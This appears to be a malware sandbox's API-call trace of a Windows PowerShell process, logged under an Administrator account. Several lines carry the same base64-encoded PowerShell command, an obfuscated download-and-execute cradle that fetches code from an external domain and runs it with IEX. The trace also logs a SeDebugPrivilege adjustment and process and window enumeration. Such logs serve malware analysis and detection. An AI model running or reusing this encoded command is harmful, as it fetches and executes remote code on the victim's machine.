	[0593.771] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0593.771] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0593.777] CoTaskMemAlloc (cb=0x104) returned 0x1b6e4cf0
	[0593.777] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b6e4cf0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0593.777] CoTaskMemFree (pv=0x1b6e4cf0) 
	[0593.779] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c7ede80 | out: pNumArgs=0x1c7ede80) returned 0x387070*=""
	[0593.780] lstrlenW (lpString="-EncodedCommand") returned 15
	[0593.781] CoTaskMemAlloc (cb=0x22) returned 0x3e6590
	[0593.781] RtlMoveMemory (in: Destination=0x3e6590, Source=0x387092, Length=0x20 | out: Destination=0x3e6590) 
	[0593.781] CoTaskMemFree (pv=0x3e6590) 
	[0593.781] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0593.781] CoTaskMemAlloc (cb=0x2f4) returned 0x36dfb0
	[0593.781] RtlMoveMemory (in: Destination=0x36dfb0, Source=0x3870b2, Length=0x2f2 | out: Destination=0x36dfb0) 
	[0593.781] CoTaskMemFree (pv=0x36dfb0) 
	[0593.782] LocalFree (hMem=0x387070) returned 0x0
	[0593.783] CoTaskMemAlloc (cb=0x804) returned 0x3f6180
	[0593.783] GetConsoleTitleW (in: lpConsoleTitle=0x3f6180, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0593.783] CoTaskMemFree (pv=0x3f6180) 
	[0593.793] CoTaskMemAlloc (cb=0x38e) returned 0x387070
	[0593.793] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c7edde0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2e6bb28 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2e6bb28*(hProcess=0x324, hThread=0x350, dwProcessId=0x1888, dwThreadId=0x1870)) returned 1
	[0593.909] CoTaskMemFree (pv=0x387070) 
	[0593.911] CloseHandle (hObject=0x350) returned 1
	[0593.911] CoTaskMemAlloc (cb=0x3b) returned 0x3ec700
	[0593.911] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7ede88, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7ede88) returned 0x4550
	[0593.912] CoTaskMemFree (pv=0x3ec700) 
	[0593.917] GetCurrentProcess () returned 0xffffffffffffffff
	[0593.917] GetCurrentProcess () returned 0xffffffffffffffff
	[0593.918] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x324, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c7edf68, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c7edf68*=0x350) returned 1

Process:
	id = "43"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1877000"
	os_pid = "0xcfc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 241
	os_tid = 0xd00

	[0437.821] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0439.007] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0439.007] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0439.007] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0439.007] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0440.469] sprintf_s (in: _DstBuf=0x1ef158, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0441.217] GetVersionExW (in: lpVersionInformation=0x1edc60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1edc60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0441.218] GetVersionExW (in: lpVersionInformation=0x1edc60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1edc60*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0441.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0441.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0441.227] GetVersionExW (in: lpVersionInformation=0x1ed9d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed9d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0441.227] SetErrorMode (uMode=0x1) returned 0x1
	[0441.228] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1edb30 | out: lpFileInformation=0x1edb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0441.229] SetErrorMode (uMode=0x1) returned 0x1
	[0441.232] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1edda0 | out: lpdwHandle=0x1edda0) returned 0x94c
	[0441.581] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d572d8 | out: lpData=0x2d572d8) returned 1
	[0441.583] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edd18, puLen=0x1edd10 | out: lplpBuffer=0x1edd18*=0x2d57374, puLen=0x1edd10) returned 1
	[0441.586] lstrlenW (lpString="䅁") returned 1
	[0441.595] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d57450, puLen=0x1edc80) returned 1
	[0441.596] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0441.598] CoTaskMemAlloc (cb=0x2e) returned 0x491cb0
	[0441.598] lstrcpyW (in: lpString1=0x491cb0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0441.599] CoTaskMemFree (pv=0x491cb0) 
	[0441.599] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d574a4, puLen=0x1edc80) returned 1
	[0441.599] lstrlenW (lpString="System.Management.Automation") returned 28
	[0441.599] CoTaskMemAlloc (cb=0x3c) returned 0x3d9860
	[0441.599] lstrcpyW (in: lpString1=0x3d9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0441.599] CoTaskMemFree (pv=0x3d9860) 
	[0441.599] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d57500, puLen=0x1edc80) returned 1
	[0441.599] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0441.600] CoTaskMemAlloc (cb=0x20) returned 0x48ffb0
	[0441.600] lstrcpyW (in: lpString1=0x48ffb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0441.600] CoTaskMemFree (pv=0x48ffb0) 
	[0441.600] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d57540, puLen=0x1edc80) returned 1
	[0441.600] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0441.600] CoTaskMemAlloc (cb=0x44) returned 0x3d9860
	[0441.600] lstrcpyW (in: lpString1=0x3d9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0441.600] CoTaskMemFree (pv=0x3d9860) 
	[0441.600] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d575a8, puLen=0x1edc80) returned 1
	[0441.600] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0441.600] CoTaskMemAlloc (cb=0x76) returned 0x446ff0
	[0441.600] lstrcpyW (in: lpString1=0x446ff0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0441.600] CoTaskMemFree (pv=0x446ff0) 
	[0441.600] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d57644, puLen=0x1edc80) returned 1
	[0441.600] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0441.600] CoTaskMemAlloc (cb=0x44) returned 0x3d9860
	[0441.600] lstrcpyW (in: lpString1=0x3d9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0441.600] CoTaskMemFree (pv=0x3d9860) 
	[0441.600] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d576a8, puLen=0x1edc80) returned 1
	[0441.600] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0441.600] CoTaskMemAlloc (cb=0x58) returned 0x466050
	[0441.600] lstrcpyW (in: lpString1=0x466050, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0441.600] CoTaskMemFree (pv=0x466050) 
	[0441.600] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d57724, puLen=0x1edc80) returned 1
	[0441.600] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0441.600] CoTaskMemAlloc (cb=0x20) returned 0x48ffb0
	[0441.600] lstrcpyW (in: lpString1=0x48ffb0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0441.600] CoTaskMemFree (pv=0x48ffb0) 
	[0441.600] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x2d573cc, puLen=0x1edc80) returned 1
	[0441.601] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0441.601] CoTaskMemAlloc (cb=0x66) returned 0x41c1a0
	[0441.601] lstrcpyW (in: lpString1=0x41c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0441.601] CoTaskMemFree (pv=0x41c1a0) 
	[0441.601] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x0, puLen=0x1edc80) returned 0
	[0441.601] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x0, puLen=0x1edc80) returned 0
	[0441.601] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1edc88, puLen=0x1edc80 | out: lplpBuffer=0x1edc88*=0x0, puLen=0x1edc80) returned 0
	[0441.601] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1edc58, puLen=0x1edc50 | out: lplpBuffer=0x1edc58*=0x2d57374, puLen=0x1edc50) returned 1
	[0441.602] CoTaskMemAlloc (cb=0x204) returned 0x43c960
	[0441.602] VerLanguageNameW (in: wLang=0x0, szLang=0x43c960, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0441.603] CoTaskMemFree (pv=0x43c960) 
	[0441.603] VerQueryValueW (in: pBlock=0x2d572d8, lpSubBlock="\\", lplpBuffer=0x1edca8, puLen=0x1edca0 | out: lplpBuffer=0x1edca8*=0x2d57300, puLen=0x1edca0) returned 1
	[0441.609] GetCurrentProcessId () returned 0xcfc
	[0441.617] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ecbd0 | out: lpLuid=0x1ecbd0*(LowPart=0x14, HighPart=0)) returned 1
	[0442.284] GetCurrentProcess () returned 0xffffffffffffffff
	[0442.285] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ecbf0 | out: TokenHandle=0x1ecbf0*=0x2e0) returned 1
	[0442.286] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2d5ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0442.287] CloseHandle (hObject=0x2e0) returned 1
	[0442.291] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcfc) returned 0x2e0
	[0442.301] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2d5abb8, cb=0x200, lpcbNeeded=0x1edc08 | out: lphModule=0x2d5abb8, lpcbNeeded=0x1edc08) returned 1
	[0442.303] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2d5ae28, cb=0x18 | out: lpmodinfo=0x2d5ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0442.304] CoTaskMemAlloc (cb=0x804) returned 0x498fb0
	[0442.304] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x498fb0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0442.305] CoTaskMemFree (pv=0x498fb0) 
	[0442.305] CoTaskMemAlloc (cb=0x804) returned 0x498fb0
	[0442.306] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x498fb0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0442.306] CoTaskMemFree (pv=0x498fb0) 
	[0442.307] CloseHandle (hObject=0x2e0) returned 1
	[0442.315] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xcfc) returned 0x2e0
	[0442.315] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x1edd38 | out: lpExitCode=0x1edd38*=0x103) returned 1
	[0442.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d5b088, Length=0x20000, ResultLength=0x1edd00 | out: SystemInformation=0x12d5b088, ResultLength=0x1edd00*=0x291c8) returned 0xc0000004
	[0442.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d7b0b8, Length=0x2b9c8, ResultLength=0x1edd00 | out: SystemInformation=0x12d7b0b8, ResultLength=0x1edd00*=0x291c8) returned 0x0
	[0442.912] EnumWindows (lpEnumFunc=0x2bd66ac, lParam=0x0) 
	[0443.655] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.026] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x558
	[0444.135] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.218] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.276] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.386] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x538
	[0444.389] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.390] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x778
	[0444.396] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x778
	[0444.398] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.400] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.402] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.424] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.447] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.449] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.542] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.635] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.728] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x460
	[0444.807] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.900] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x4d0
	[0444.947] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1520
	[0444.948] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x14bc
	[0445.250] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xf8c
	[0445.440] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xe9c
	[0445.666] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1434
	[0445.821] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x14ec
	[0445.914] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xfcc
	[0446.039] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x12ac
	[0446.133] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1484
	[0446.226] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x934
	[0446.273] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xc0c
	[0446.351] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xb08
	[0446.398] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x948
	[0446.470] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x1178
	[0446.538] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x13e0
	[0446.648] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xcd0
	[0446.741] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0x13fc
	[0446.849] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1eda60 | out: lpdwProcessId=0x1eda60) returned 0xdc8
